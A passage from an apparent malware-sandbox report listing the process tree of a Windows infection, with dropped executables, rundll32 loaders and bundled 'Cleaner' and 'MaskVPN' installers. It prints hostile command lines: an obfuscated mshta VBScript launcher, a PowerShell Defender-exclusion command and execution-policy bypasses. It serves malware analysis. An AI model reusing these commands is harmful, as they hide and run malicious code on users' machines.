                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:8080
                                                                                                                                                                  • C:\Users\Admin\Documents\WjN01g9DeN6yC8xgDgY0l708.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\WjN01g9DeN6yC8xgDgY0l708.exe"
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:6048
                                                                                                                                                                  • C:\Users\Admin\Documents\OcqiqPSianyhfvYBELaTbm9S.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\OcqiqPSianyhfvYBELaTbm9S.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                    PID:8124
                                                                                                                                                                  • C:\Users\Admin\Documents\PC7bgazsumnxB4cLVrvIeJGD.exe
                                                                                                                                                                    "C:\Users\Admin\Documents\PC7bgazsumnxB4cLVrvIeJGD.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:7880
                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\PC7bgazsumnxB4cLVrvIeJGD.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\PC7bgazsumnxB4cLVrvIeJGD.exe"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                                        7⤵
                                                                                                                                                                          PID:7096
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\PC7bgazsumnxB4cLVrvIeJGD.exe" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" == "" for %A In ("C:\Users\Admin\Documents\PC7bgazsumnxB4cLVrvIeJGD.exe" ) do taskkill -f -iM "%~NxA"
                                                                                                                                                                            8⤵
                                                                                                                                                                              PID:3956
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE
                                                                                                                                                                                hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:8748
                                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                    "C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe ( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN( "C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF ""-p3auHHA5Pn7qj14hc1xRG9TH8FS "" == """" for %A In (""C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE"" ) do taskkill -f -iM ""%~NxA"" " ,0 , TRUE) )
                                                                                                                                                                                    10⤵
                                                                                                                                                                                      PID:8876
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        "C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "-p3auHHA5Pn7qj14hc1xRG9TH8FS " == "" for %A In ("C:\Users\Admin\AppData\Local\Temp\hBS_VbW.EXE" ) do taskkill -f -iM "%~NxA"
                                                                                                                                                                                        11⤵
                                                                                                                                                                                          PID:9032
                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                        "C:\Windows\System32\rundll32.exe" .\QnEJR.fPC,a
                                                                                                                                                                                        10⤵
                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                        PID:8980
                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                      taskkill -f -iM "PC7bgazsumnxB4cLVrvIeJGD.exe"
                                                                                                                                                                                      9⤵
                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                      PID:9128
                                                                                                                                                                              • C:\Users\Admin\Documents\zgdstlW0HAVxT8N6LQgwLlEp.exe
                                                                                                                                                                                "C:\Users\Admin\Documents\zgdstlW0HAVxT8N6LQgwLlEp.exe"
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:7800
                                                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\ZGDSTL~1.DLL,s C:\Users\Admin\DOCUME~1\ZGDSTL~1.EXE
                                                                                                                                                                                    7⤵
                                                                                                                                                                                    • Blocklisted process makes network request
                                                                                                                                                                                    PID:1328
                                                                                                                                                                                    • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                      C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\ZGDSTL~1.DLL,WjUlNVo=
                                                                                                                                                                                      8⤵
                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                      PID:8728
                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath C:\Users\Admin\DOCUME~1\ZGDSTL~1.DLL
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:4020
                                                                                                                                                                                        • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                          C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\ZGDSTL~1.DLL,TiQpTjJlbA==
                                                                                                                                                                                          9⤵
                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                          PID:9412
                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                            C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31804
                                                                                                                                                                                            10⤵
                                                                                                                                                                                            • Modifies Internet Explorer settings
                                                                                                                                                                                            PID:9720
                                                                                                                                                                                            • C:\Windows\system32\ctfmon.exe
                                                                                                                                                                                              ctfmon.exe
                                                                                                                                                                                              11⤵
                                                                                                                                                                                                PID:6952
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp4510.tmp.ps1"
                                                                                                                                                                                            9⤵
                                                                                                                                                                                              PID:6860
                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpA7E4.tmp.ps1"
                                                                                                                                                                                              9⤵
                                                                                                                                                                                                PID:10192
                                                                                                                                                                                                • C:\Windows\SysWOW64\nslookup.exe
                                                                                                                                                                                                  "C:\Windows\system32\nslookup.exe" -type=any localhost
                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                    PID:5116
                                                                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                  schtasks /End /tn \Microsoft\Windows\Wininet\CacheTask
                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                    PID:3272
                                                                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                    schtasks /Run /tn \Microsoft\Windows\Wininet\CacheTask
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                      PID:580
                                                                                                                                                                                            • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                              "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
                                                                                                                                                                                              5⤵
                                                                                                                                                                                                PID:2100
                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                    PID:408
                                                                                                                                                                                                • C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
                                                                                                                                                                                                  "C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                  PID:6136
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\6887424.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\6887424.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:7040
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1731448.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\1731448.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                      PID:7064
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\5020599.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\5020599.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:7140
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5858019.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5858019.exe"
                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                          PID:6180
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\6442924.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\6442924.exe"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:216
                                                                                                                                                                                                  • C:\Users\Admin\Documents\P8Fvy9gvgEkL7wxDtUjxd2my.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\P8Fvy9gvgEkL7wxDtUjxd2my.exe"
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:4656
                                                                                                                                                                                                      • C:\Users\Admin\Documents\P8Fvy9gvgEkL7wxDtUjxd2my.exe
                                                                                                                                                                                                        "C:\Users\Admin\Documents\P8Fvy9gvgEkL7wxDtUjxd2my.exe" -q
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                        PID:4040
                                                                                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                      PID:356
                                                                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                                                                      PID:1232
                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        • Modifies registry class
                                                                                                                                                                                                        PID:4864
                                                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                      C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                                                                      PID:8028
                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding CE620B80C0B9B837479D59779453A3F4 C
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        PID:8456
                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 43E1ADB76F76757042FA9B874EEB3D22 C
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        PID:8780
                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding B8B9C220AA46F1B0AB1993546DBFF14C
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        PID:1540
                                                                                                                                                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 55DC026F9F020EF7BC8A512860D13C00 C
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                        PID:5556
                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                                        PID:9464
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                          PID:8928
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                            PID:9348
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1fc,0x200,0x204,0x1d8,0x208,0x7ff9d2b3dec0,0x7ff9d2b3ded0,0x7ff9d2b3dee0
                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                PID:9356
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff6bc069e70,0x7ff6bc069e80,0x7ff6bc069e90
                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                  • Enumerates connected drives
                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                  PID:6724
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1812,10342891410550724083,12389354931372908858,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9348_102495436" --mojo-platform-channel-handle=1888 /prefetch:8
                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                  PID:5720
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1812,10342891410550724083,12389354931372908858,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9348_102495436" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2408 /prefetch:1
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                  PID:4752
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1812,10342891410550724083,12389354931372908858,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9348_102495436" --mojo-platform-channel-handle=1876 /prefetch:8
                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                    PID:5704
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1812,10342891410550724083,12389354931372908858,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9348_102495436" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2428 /prefetch:1
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                    • Checks computer location settings
                                                                                                                                                                                                                    PID:6796
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1812,10342891410550724083,12389354931372908858,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9348_102495436" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1828 /prefetch:2
                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                      PID:5600
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1812,10342891410550724083,12389354931372908858,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9348_102495436" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3236 /prefetch:2
                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                        PID:7488
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1812,10342891410550724083,12389354931372908858,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9348_102495436" --mojo-platform-channel-handle=3268 /prefetch:8
                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                          PID:10040
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1812,10342891410550724083,12389354931372908858,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9348_102495436" --mojo-platform-channel-handle=3408 /prefetch:8
                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                            PID:996
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1812,10342891410550724083,12389354931372908858,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9348_102495436" --mojo-platform-channel-handle=3276 /prefetch:8
                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                              PID:2596
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1812,10342891410550724083,12389354931372908858,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9348_102495436" --mojo-platform-channel-handle=3556 /prefetch:8
                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                PID:5280
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1812,10342891410550724083,12389354931372908858,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9348_102495436" --mojo-platform-channel-handle=1052 /prefetch:8
                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                  PID:6032
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_F0A7.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:7996
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            PID:3868
                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                            PID:7368
                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                            PID:7024
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                              PID:9224
                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                            • Drops file in Windows directory
                                                                                                                                                                                                                            • Checks SCSI registry key(s)
                                                                                                                                                                                                                            PID:9368
                                                                                                                                                                                                                            • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                              DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7f88d447-96cf-534d-bd38-7442ee7a736f}\oemvista.inf" "9" "4d14a44ff" "0000000000000170" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                              PID:9476
                                                                                                                                                                                                                            • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                              DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000170"
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                              • Drops file in Drivers directory
                                                                                                                                                                                                                              • Drops file in System32 directory
                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                              PID:9776
                                                                                                                                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:9828
                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                              PID:9820
                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                              • Checks processor information in registry
                                                                                                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                                                                                                              PID:7664
                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
                                                                                                                                                                                                                                MaskVPNUpdate.exe /silent
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                PID:7752
                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
